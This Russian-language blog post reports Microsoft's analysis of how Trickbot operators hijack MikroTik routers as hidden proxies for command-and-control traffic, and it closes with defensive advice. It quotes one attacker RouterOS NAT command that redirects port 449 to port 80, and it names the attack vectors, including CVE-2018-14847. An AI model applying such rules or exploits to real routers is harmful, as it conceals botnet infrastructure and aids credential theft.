Специалистам по информационной безопасности ботнет Trickbot известен с 2016 года. Его главная задача при заражении устройства — отслеживание конфиденциальной информации пользователя. Не фоточек или видео, нет, а связок пароль/логин для банковских приложений и других сервисов. В целом, ботнет заточен под корпоративный шпионаж, но страдают от него и обычные пользователи, причем «жертв» много. Со временем выяснилось, что ботнет особенно сильно «любит» роутеры MikroTik. Сейчас представители корпорации Microsoft выяснили, почему так сложилось.
В чем опасность ботнета
С момента появления главным предназначением зловредного ПО Trickbot является кража паролей пользователей к учетным записям в разных банках. Полученные данные киберпреступники активно используют в банковских аферах.
С течением времени ботнет стал не только воровать данные пользователей. Его «научили» специальным образом модифицировать трафик пользователей и распространяться по сети. После того, как вирус попал в систему, он открывает доступ для новых зловредов. В общем, универсальный инструмент в руках киберпреступников.
Ботнет стал настолько опасным, что Microsoft и другим крупным корпорациям пришлось даже организовать совместную операцию по саботажу инфраструктуры управления и контроля (C2), используемой вредоносным ПО Trickbot. Партнерами Microsoft в этой непростой борьбе стали ESET, Lumen's Black Lotus Labs, NTT, Symantec и другие компании.
Microsoft решила найти лазейку в законодательстве для того, чтобы уничтожить инфраструктуру ботнета. Корпорация смогла использовать в суде закон США о товарных знаках для того, чтобы ликвидировать инфраструктуру ботнета. В 2020 году корпорация сообщила следующее: «Мы отключили ключевые компоненты инфраструктуры, чтобы те, кто управляет Trickbot, не смогли инициировать новые заражения или активировать вирусы-вымогатели, уже внедренные в компьютерные системы».
Правда, после этих действий ботнет не умер полностью, но все же его удалось значительно ослабить. Исследователи заметили одну вещь — зловред почему-то очень активно работал с роутерами MikroTik, атакуя их активнее прочих сетевых девайсов. Ну и сейчас корпорация Microsoft выяснила, почему так случилось.
Если вы читаете наш блог, вас могут заинтересовать эти тексты:
→ Как мы выбирали лучшие из новых видеокарт NVIDIA
→ Зачем дата-центры устанавливают динамические источники бесперебойного питания
→ Стоит ли создавать собственный корпус для сервера
Что удалось выяснить?
В среду корпорация Microsoft заявила, что операторы ботнета активно компрометируют роутеры MikroTik, чтобы использовать их с целью сокрытия местоположения серверов управления и контроля, которые собирают данные с зараженных компьютеров, а также отправляют команды операторам ботнета.
Схема достаточно простая и вместе с тем оригинальная. Вместо того, чтобы подключаться к управляющим серверам, инфицированные ПК и ноутбуки сначала подключаются с зараженным роутерам. А потом уже к серверам оператора ботнета. Таким образом, роутеры MikroTik являются «посредниками» в деле, организованном киберпреступниками.
Заражение роутеров — достаточно разумный ход взломщиков. Когда сотрудники отдела безопасности в компании анализируют соединения зараженных компьютеров, то видят лишь IP-адреса, которые принадлежат маршрутизаторам. То есть это почти полная иллюзия нормальной работы сети. Соответственно, расположение управляющих серверов скрыто и не может быть обнаружено без прямого доступа к прокси-маршрутизатору.
Именно таким образом злоумышленники добивались создания надежной, но сложно обнаруживаемой линии связи между зараженными ПК и сервером С2. Стандартные системы защиты просто не обнаруживали никаких подозрительных активностей. Ну а начиналось все как раз со взлома маршрутизатора MikroTik.
Откуда такая любовь к производителю роутеров?
Дело в том, что девайсы от MikroTik работают с уникальной ОС, которая называется MikroTik RouterOS. Она дает возможность пользователям дистанционно передавать команды, которые используют протокол SSH. Достоинства роутеров — их гибкость, функциональность и возможность работы с большим количеством команд — превратились в слабое место. Операторы Trickbot при помощи всего одной команды заставляли большое количество устройств направлять трафик определенным образом. Пример команды:
/ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses= dst-address=Она создает новое правило, которое дает возможность получать данные от скомпрометированных компьютеров через порт 449. А потом эти данные передаются уже на командные серверы ботнета через 80-й порт.
Команда, к слову, вполне обычная, если так можно выразиться «легальная». Но в данном кейсе речь идет об использовании вполне обычных команд злоумышленниками.
Способ взлома роутеров
Для массового взлома роутеров злоумышленники использовали несколько векторов атаки:
- Самая простая атака, направленная на роутеры с дефолтными паролями от MikroTik.
- Подбор паролей, возможно, с использованием данных, ранее собранных с других устройств MikroTik.
- Эксплуатация уязвимости CVE-2018-14847 на устройствах с версией RouterOS до 6.42. Этот способ позволяет считывать файлы вроде user.dat. К слову, именно эта уязвимость считается одной из наиболее критических для роутеров указанной компании.
Как только удавалось взломать роутер, злоумышленники меняли пароль для предотвращения перехвата управления девайсом со стороны владельца или кого-либо еще.
Для того, чтобы обезопасить пользователей, корпорация Microsoft выпустила открытый инструмент, который позволяет вести мониторинг состояния маршрутизаторов — как дома, так и в офисе. В ходе мониторинга решение от Microsoft выполняет несколько задач, включая:
- Получение версии устройства и ее сопоставление со всеми уязвимостями.
- Проверка запланированных тасков.
- Поиск подозрительных NAT-правил.
- Поиск DNS cache poisoning.
- Обнаружение изменений дефолтных портов.
- Поиск созданных пользователей, не являющихся дефолтными.
В целом, самый простой способ избежать заражения — это отключение удаленного доступа. Конечно, в том случае, если он не нужен пользователю. Ну и плюс стандартные методы вроде уникальных паролей, регулярной их смены, обновления прошивки и т.п.
Если все реализовать корректно, то проблем не будет. Не болейте.
